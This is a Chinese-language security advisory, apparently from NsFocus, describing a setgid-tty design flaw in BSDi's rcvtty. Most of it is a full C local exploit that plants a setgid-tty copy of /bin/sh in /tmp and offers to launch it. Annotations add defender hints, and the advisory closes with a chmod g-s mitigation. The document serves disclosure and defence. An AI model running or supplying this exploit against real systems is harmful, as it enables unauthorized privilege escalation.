BSDi3.0/4.0 rcvtty执行任意脚本漏洞
发布日期:2000-11-29
更新日期:2000-11-29
受影响系统:
BSDI BSD/OS 4.0.1
BSDI BSD/OS 4.0
BSDI BSD/OS 3.1
BSDI BSD/OS 3.0
描述:
BSDi 3.0/4.0中的/usr/contrib/mh/lib/rcvtty存在一个设计缺陷:该程序缺省被设置了sgid tty属性,但在执行命令行上指定的shell脚本时没有丢弃sgid权限,因此脚本会以tty组的权限运行。本地用户很容易利用该缺陷获取tty组的权限,进而存在更深程度破坏系统安全性的可能。
<* 来源:Vade79 (v9@fakehalo.org) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* (BSDi3.0/4.0)rcvtty[mh] local exploit, by
* v9[v9@fakehalo.org]. gives gid=4(tty).
*
* info: found/exploit by: v9[v9@fakehalo.org].
*/
/* Target binary named in the advisory; main() proceeds only if it is setgid tty. */
#define PATH "/usr/contrib/mh/lib/rcvtty"
/* Temporary script handed to PATH; main() unlinks it again after the run. */
#define MAKESHELL "/tmp/mksh.sh"
/* Artifact that stays on disk: a copy of /bin/sh left setgid tty on success. */
#define SGIDSHELL "/tmp/ttysh"
/* Numeric gid assumed for group tty; the file header states gid=4(tty). */
#define GIDTTY 4
#include <stdio.h>
#include <sys/stat.h>
/*
 * Proof-of-concept driver for the rcvtty issue described in the advisory.
 *
 * Flow, as written below:
 *   1. stat() PATH and continue only if its mode and group match the
 *      expected setgid-tty values.
 *   2. Write a small /bin/sh script to MAKESHELL that copies /bin/sh to
 *      SGIDSHELL and sets its group and setgid bit.
 *   3. Run PATH with MAKESHELL as its argument via system(), then unlink
 *      the script.
 *   4. stat() SGIDSHELL to see whether the copy ended up setgid tty, and
 *      optionally exec it.
 *
 * Root cause (from the advisory text, not visible in this file): rcvtty
 * runs the script named on its command line without first dropping its
 * setgid tty privilege.
 *
 * For defenders: MAKESHELL is removed by the PoC itself; SGIDSHELL is the
 * artifact that stays on disk. A setgid-tty file that is not a known
 * system binary is worth investigating. The advisory's interim fix is
 * chmod g-s on PATH.
 *
 * Exits with status 1 on any failed check and 0 otherwise. The argument
 * vector is not used.
 *
 * NOTE(review): only <stdio.h> and <sys/stat.h> are included, yet exit(),
 * system(), unlink() and execl() are called, so those calls rely on
 * implicit declarations.
 */
int main ( int arg, char * argv[] )
{
/* NOTE(review): `in` is declared with zero elements; see the scanf() call below. */
char cmd[256], in[0];
struct stat mod1, mod2;
FILE * sgidexec;
fprintf( stderr, "[ (BSDi3.0/4.0)rcvtty[mh] local exploit, by v9[v9@fakehalo.org ]. ]\n\n" );
/* stat() returns non-zero on any failure; the message assumes the file is missing. */
if ( stat( PATH, &mod1 ) )
{
fprintf( stderr, "[!] failed, %s doesnt appear to exist.\n", PATH );
exit( 1 );
}
/*
 * 34285 == 0102755: regular file, setgid, rwxr-xr-x. The comparison is
 * exact, so a setgid-tty binary with any other permission bits lands in
 * the "isn't setgid" branch. A negative result from this check is
 * therefore not evidence that a host is unaffected.
 */
else if ( mod1.st_mode == 34285 && mod1.st_gid == GIDTTY )
{
fprintf( stderr, "[*] %s appears to be setgid tty(%d).\n", PATH, GIDTTY );
}
else
{
fprintf( stderr, "[!] failed, %s isn't setgid tty(%d).\n", PATH, GIDTTY );
exit( 1 );
}
fprintf( stderr, "[*] now making shell script to execute.\n" );
/*
 * NOTE(review): fixed, predictable name under /tmp, and the fopen()
 * result is not checked before the fprintf() calls that follow.
 */
unlink( MAKESHELL );
sgidexec = fopen( MAKESHELL, "w" );
/* Script body: copy /bin/sh to SGIDSHELL, set its group to GIDTTY, set mode 2755. */
fprintf( sgidexec, "#!/bin/sh\n" );
fprintf( sgidexec, "cp /bin/sh %s\n", SGIDSHELL );
fprintf( sgidexec, "chgrp %d %s\n", GIDTTY, SGIDSHELL );
fprintf( sgidexec, "chmod 2755 %s\n", SGIDSHELL );
fclose( sgidexec );
/* 33261 == 0100755, i.e. rwxr-xr-x plus the regular-file type bit. */
chmod( MAKESHELL, 33261 );
fprintf( stderr, "[*] done, now building and executing the command line.\n" );
/*
 * Runs PATH with MAKESHELL as its only argument, feeds "yes" on stdin and
 * discards stdout/stderr. Presumably the "yes" answers a prompt from
 * rcvtty; that is not verifiable from this file.
 */
snprintf( cmd, sizeof( cmd ), "echo yes | %s %s 1>/dev/null 2>&1", PATH, MAKESHELL );
system( cmd );
/* The script is removed whether or not the run worked; the system() result is ignored. */
unlink( MAKESHELL );
fprintf( stderr, "[*] done, now checking for success.\n" );
if ( stat( SGIDSHELL, &mod2 ) )
{
fprintf( stderr, "[!] failed, %s doesn't exist.\n", SGIDSHELL );
exit( 1 );
}
/* Same exact-mode comparison as above, now applied to the copied shell. */
else if( mod2.st_mode == 34285 && mod2.st_gid == GIDTTY )
{
fprintf( stderr, "[*] success, %s is now setgid tty(%d).\n", SGIDSHELL, GIDTTY );
}
else
{
fprintf( stderr, "[!] failed, %s isn't setgid tty(%d).\n", SGIDSHELL, GIDTTY );
exit( 1 );
}
fprintf( stderr, "[*] finished, everything appeared to have gone successful.\n" );
fprintf( stderr, "[?] do you wish to enter the sgidshell now(y/n)?: " );
/*
 * NOTE(review): "%s" is unbounded and `in` is a zero-length array, so any
 * input is written out of bounds (undefined behaviour in the PoC itself).
 */
scanf( "%s", in );
/* 0x59 and 0x79 are ASCII 'Y' and 'y'; anything else skips the exec. */
if ( in[0] != 0x59 && in[0] != 0x79 )
{
printf( "[*] ok, aborting execution, the shell is: %s. otgpdvt.\n", SGIDSHELL );
}
else
{
printf( "[*] ok, executing shell(%s) now.\n", SGIDSHELL );
/*
 * Replaces this process with SGIDSHELL; execl() returns only on failure,
 * in which case control falls through to exit( 0 ).
 * NOTE(review): the argument list is terminated with a bare 0 rather
 * than (char *)0.
 */
execl( SGIDSHELL, SGIDSHELL, 0 );
}
exit( 0 );
} /* end of main */
建议:
临时解决方案:
NsFocus建议您暂时去掉该程序的sgid位: chmod g-s /usr/contrib/mh/lib/rcvtty 。去掉该位后rcvtty可能无法再向用户终端写入通知;另请检查系统中是否已存在来历不明的sgid tty文件(例如上面测试程序生成的/tmp/ttysh)。
厂商补丁:
暂无